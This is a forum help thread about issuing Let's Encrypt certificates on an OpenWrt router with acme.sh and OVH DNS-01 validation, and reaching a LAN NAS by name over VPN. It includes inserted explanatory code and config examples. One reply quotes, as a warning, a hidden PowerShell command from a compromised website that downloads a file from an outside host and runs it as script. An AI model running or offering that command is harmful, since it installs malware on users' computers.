Acme certificate from OVH on LAN with validation_method dns

Hi all, I am trying to install certificates and I assume I am not at ease with the concept.

here is the architecture

Internet          | OpenWrt       | NAS
xxx.xxx.xxx.xxx   | 192.168.1.1   | 192.168.1.xxx

website Ovh : domo-tic.com
redirection : loft.domo-tic.com
zone DNS Type A : loft.domo-tic.com

I have upgraded OpenWrt to the latest release from scratch, and am now trying to install acme after OpenVPN.

Ports 80/443 are open

config rule 'wan_https_allow'
	option name 'Allow HTTP, HTTPS from WAN'
	option src 'wan'
	option proto 'tcp'
	option dest_port '80 443'
	option target 'ACCEPT'

steps for installation

# https://openwrt.org/docs/guide-user/services/tls/acmesh
opkg update
opkg install acme acme-acmesh acme-acmesh-dnsapi acme-common
opkg install luci-app-acme luci-ssl-openssl

#https://github.com/acmesh-official/acme.sh/wiki/How-to-run-on-OpenWRT
opkg update
opkg install luci-app-uhttpd

# https://openwrt.org/docs/guide-user/luci/luci.secure#allow_access_from_internet
uci set uhttpd.main.redirect_https=1     # 1 to enable redirect, 0 to disable redirect
uci commit uhttpd
service uhttpd reload

to create the API token at OVH
https://api.ovh.com/createToken/?GET=/domain/zone/mydomain.com/&POST=/domain/zone/mydomain.com/&PUT=/domain/zone/mydomain.com/&GET=/domain/zone/mydomain.com&DELETE=/domain/zone/mydomain.com/record/

#  cat /etc/config/acme

config acme
        option account_email 'name.surname@xxx.xxx'
        option debug '1'

config cert 'domotic_com'
        option enabled '0'
        option update_uhttpd '0'
        option validation_method 'webroot'
        option staging '0'
        option key_type 'rsa2048'
        list domains '*.domo-tic.com'
        option webroot '/var/run/acme/challenge/'

config cert 'loft_domo_tic_com'
        option enabled '1'
        option validation_method 'dns'
        option staging '0'
        option dns 'dns_ovh'
        list credentials 'OVH_AK="OVH API Application key"'
        list credentials 'OVH_AS="OVH API Application secret"'
        list credentials 'OVH_END_POINT="ovh-eu"'
        list credentials 'OVH_CK="OVH API Application description"'
        option key_type 'rsa2048'
        list domains 'loft.domo-tic.com'

From my computer, running OpenVPN:

  • first, when accessing OpenWrt (screenshot not reproduced)

  • second, I use my NAS to aggregate all emails. My client shows me a warning when trying to connect using 192.168.1.xxx

What I notice is C=US, maybe that is one of the problems?

If I run

# /etc/init.d/acme restart

I notice this error: Error, can not get domain token entry *.domo-tic.com for http-01
The supported validation types are: dns-01 , but you specified: http-01

Many thanks for your help again!
Arnaud

FQDN <> IP address, which is probably what your error message's telling you, but in French.

@frollic, thanks for your response,

OK, the certificate is for loft.domo-tic.com.
If I use OpenVPN (so without any port forward), and I want to connect to the Synology mail server, am I supposed to do it like that?

Same for the router: https://192.192.1.1 ?

Sincerely.
Arnaud

not sure if you should compare IMAP with HTTPS.

192.168.1.1 isn't the name nor the IP of your mail server, is it ?

OT:
what kind of f-ed up site is domo-tic.com ?

the content of what it tells you to run looks like serious fun, it DLs 500kb of data, and executes it:

cmd /c start /min powershell -Command "$f=Join-Path $env:TEMP 'bop.txt'; curl.exe -s 'https://diab.live/up/' -o $f; Start-Process -WindowStyle Hidden -FilePath 'cscript.exe' -ArgumentList '//E:jscript',$f" #  ✔ ''Action Identificator: 3605''

I would consider my computer compromised after running it.

You're exposing your LuCI web UI to the internet, fix your firewall, you've got VPN.

Done!
It was for a try :).

Ouch, it is an old website, I have solved the problem! Sorry!!!
Arnaud

Sorry, sorry for my lack of knowledge.

192.168.1.1 is my OpenWrt router
192.168.1.159 is my Synology NAS running Mail Plus Server.

loft.domo-tic.com is the redirection from OVH domo-tic.com to access my LAN.

The 2 problems are

  • acme that seems not to be working (https://192.168.1.1), with a Chrome security warning
  • and accessing the IMAP server not working on 192.168.1.159

Thank you again
Arnaud

OVH seems to provide VPSes and VMs, are you CGNATed?

as stated earlier, 192.168.1.1 <> loft.domo-tic.com, you need to access the openwrt router IP using the FQDN.

from where, using what, via what ?

OVH seems to provide VPSes and VMs, are you CGNATed?
==> I do not understand what you mean by CGNATed

as stated earlier, 192.168.1.1 <> loft.domo-tic.com , you need to access the openwrt router IP using the FQDN.
==> I do not understand

from where, using what, via what?
==> from WAN using my Android or computer via OpenVPN.
==> from LAN using my Android or computer.

the cert's for loft.domo-tic.com not 192.168.1.1, using an IP will always generate a warning.

loft.domo-tic.com points to your 109 IP, you should be able to use https://loft.domo-tic.com from any client on the LAN side, assuming the web server certs are configured correctly, and the 109 IP's the one sitting on your router's WAN port.

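The point made above (the cert is for loft.domo-tic.com, so typing an IP address will always warn) comes down to how a TLS client matches the name it was given against the certificate's subjectAltName entries. The following is an added example, not code from the thread or from acme.sh: a small RFC 6125-style matcher run against SAN lists constructed here to mirror the two certificates the thread discusses (loft.domo-tic.com, and the *.domo-tic.com wildcard). It shows that an IP in the URL only ever matches an iPAddress SAN, and that a wildcard covers nas.domo-tic.com but neither the bare domo-tic.com nor a deeper name.

```python
"""Hostname-vs-certificate matching, the check a browser or mail client
performs before it shows (or does not show) the 'name mismatch' warning.

Added example for this thread; the SAN lists at the bottom are constructed
here and are not copied from a real certificate."""
import ipaddress


def _dns_match(pattern: str, host: str) -> bool:
    """Match one dNSName SAN entry against a hostname (RFC 6125 rules).

    A wildcard is honoured only as the entire left-most label, only when at
    least two labels follow it, and it matches exactly one label: so
    '*.domo-tic.com' covers 'nas.domo-tic.com' but not 'domo-tic.com' nor
    'imap.nas.domo-tic.com'. Partial wildcards ('l*ft') are rejected."""
    pattern = pattern.lower().rstrip(".")
    host = host.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == host
    p_labels, h_labels = pattern.split("."), host.split(".")
    if p_labels[0] != "*" or "*" in pattern[1:]:
        return False
    if len(p_labels) < 3:          # '*.com' style wildcards are never valid
        return False
    return len(h_labels) == len(p_labels) and h_labels[1:] == p_labels[1:]


def cert_covers(sans, requested: str) -> bool:
    """True if the name or IP the client typed is covered by the certificate.

    `sans` is a list of (type, value) tuples as found in a SAN extension,
    e.g. ('DNS', 'loft.domo-tic.com') or ('IP', '192.168.1.1').
    An IP literal is compared against iPAddress entries only, never against
    dNSName entries: a name-only cert therefore warns for https://192.168.1.1
    no matter which name it was issued for."""
    try:
        ip = ipaddress.ip_address(requested)
    except ValueError:
        ip = None
    for kind, value in sans:
        if ip is not None:
            if kind == "IP" and ipaddress.ip_address(value) == ip:
                return True
        elif kind == "DNS" and _dns_match(value, requested):
            return True
    return False


# Constructed SAN lists mirroring the thread's two certificate entries.
LOFT_CERT = [("DNS", "loft.domo-tic.com")]
WILDCARD_CERT = [("DNS", "*.domo-tic.com")]


def explain(sans, requested: str) -> str:
    """One-line verdict for a name, as the client would decide it."""
    ok = cert_covers(sans, requested)
    return f"{requested:>22}: {'ok' if ok else 'WARNING (name mismatch)'}"


if __name__ == "__main__":
    print("loft.domo-tic.com certificate:")
    for name in ("loft.domo-tic.com", "192.168.1.1", "192.168.1.159"):
        print(explain(LOFT_CERT, name))
    print("*.domo-tic.com certificate:")
    for name in ("nas.domo-tic.com", "imap.nas.domo-tic.com",
                 "domo-tic.com", "192.168.1.159"):
        print(explain(WILDCARD_CERT, name))
```

The takeaway for the thread: every service must be reached through a name that appears in its certificate's SAN list, which is why the router and the NAS each need a matching FQDN (or one wildcard covering both) rather than their 192.168.1.x addresses.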

That makes sense!
But what about the NAS?

What is this concept of accessing 192.xxx via loft:xxxx? How to?

Many thanks again for your time.
Arnaud

technically you shouldn't/can't, since the NAS name isn't loft.domo-tic.com, it can still be done using apache and mod_proxy, acting as the frontend, but I guess we're talking about IMAP here, not HTTPS?

create a nas.domo-tic.com DNS entry, point it towards 192.168.1.159 in your router's DNS, but the public 109 IP at OVH.
generate a cert for nas.domo-tic.com, or create a *.domo-tic.com cert, and use one cert on all your hosts.

if you really only care about the FQDN on the NAS, simply map 192.168.1.159 to loft.domo-tic.com in openwrt, and you're done.

the cert obviously has to sit on the NAS, not the router.

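The advice above (a LAN-only DNS name for the NAS while the public name stays at OVH, plus one wildcard certificate for every host) maps onto two OpenWrt config files. The fragments below are an added example, not the poster's configuration and not taken from the OpenWrt documentation: the hostnames and the NAS address follow the thread, the OVH credential values are placeholders, and the `address` lines are assumed to be added to the existing `dnsmasq` section of /etc/config/dhcp. The broken cert entry is kept next to the working one because the error quoted earlier in the thread ("The supported validation types are: dns-01, but you specified: http-01") is exactly what a wildcard name produces under the webroot method: a wildcard can only be validated with dns-01.

```uci
# /etc/config/dhcp  (added to the existing dnsmasq section)
# Split-horizon names: LAN and VPN clients get private answers from the
# router, while the OVH zone keeps pointing the public names at the
# dynamic WAN IP. Nothing private is published outside.
config dnsmasq
        list address '/loft.domo-tic.com/192.168.1.1'
        list address '/nas.domo-tic.com/192.168.1.159'

# /etc/config/acme
config acme
        option account_email 'name.surname@xxx.xxx'

# Broken: a wildcard cannot be issued via http-01/webroot. This is the
# entry that triggers "can not get domain token entry *.domo-tic.com for
# http-01 ... but you specified: http-01". Kept disabled for comparison.
config cert 'wildcard_webroot_broken'
        option enabled '0'
        option validation_method 'webroot'
        option webroot '/var/run/acme/challenge/'
        option key_type 'rsa2048'
        list domains '*.domo-tic.com'

# Working: dns-01 through the OVH API, which also means no inbound
# 80/443 rule is needed on the WAN zone for the challenge.
# OVH_CK is the consumer key returned by the createToken page, not a
# free-text description.
config cert 'wildcard_dns'
        option enabled '1'
        option validation_method 'dns'
        option dns 'dns_ovh'
        list credentials 'OVH_AK=<application key>'
        list credentials 'OVH_AS=<application secret>'
        list credentials 'OVH_CK=<consumer key>'
        list credentials 'OVH_END_POINT=ovh-eu'
        option key_type 'rsa2048'
        option update_uhttpd '1'
        list domains '*.domo-tic.com'
        list domains 'domo-tic.com'
```

With this in place, https://loft.domo-tic.com reaches the router and nas.domo-tic.com reaches the NAS from both the LAN and the VPN, and each answers with a name the wildcard covers. The router only issues the certificate; as noted above, the key and chain still have to be copied to the NAS and installed in Mail Plus Server there, and re-copied on each renewal. The credential list should be treated as a secret: it grants write access to the whole DNS zone, so scope the token to the zone paths the createToken URL above already lists and nothing more.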

OT again
if you use a site like desec.io for your DNS handling, you don't have to open your firewall for the Acme cert verification.

Dear @frollic, you are so helpful!

Let's say that I have many servers on the LAN, some VMs (having their own IP on the LAN) and some dockerized applications (also having their own LAN IP, and some reachable via 192.168.1.159:xxx).

DynHost is defined at my provider OVH to redirect loft.domo-tic.com to my (non-fixed) IP (which is updated if necessary by OpenWrt using DDNS).

What I understand is that (without having to forward OpenWrt ports, and using OpenVPN) it is to

Sorry, but I am really wondering finally what the best solution is to be able to have certificates, using OpenVPN, and later having a reverse proxy.

Sincerely.
Arnaud

If you're exposing them directly to internet without VPN (this is stupid), you have two options.

Unique FQDNs, or loft.domo-tic.com:port+n, then use lighttpd or apache to have a cross reference table with which FQDN or port uses what service on your LAN.

It'd be easier to simply use VPN, then you can access all services directly by a FQDN[:port].
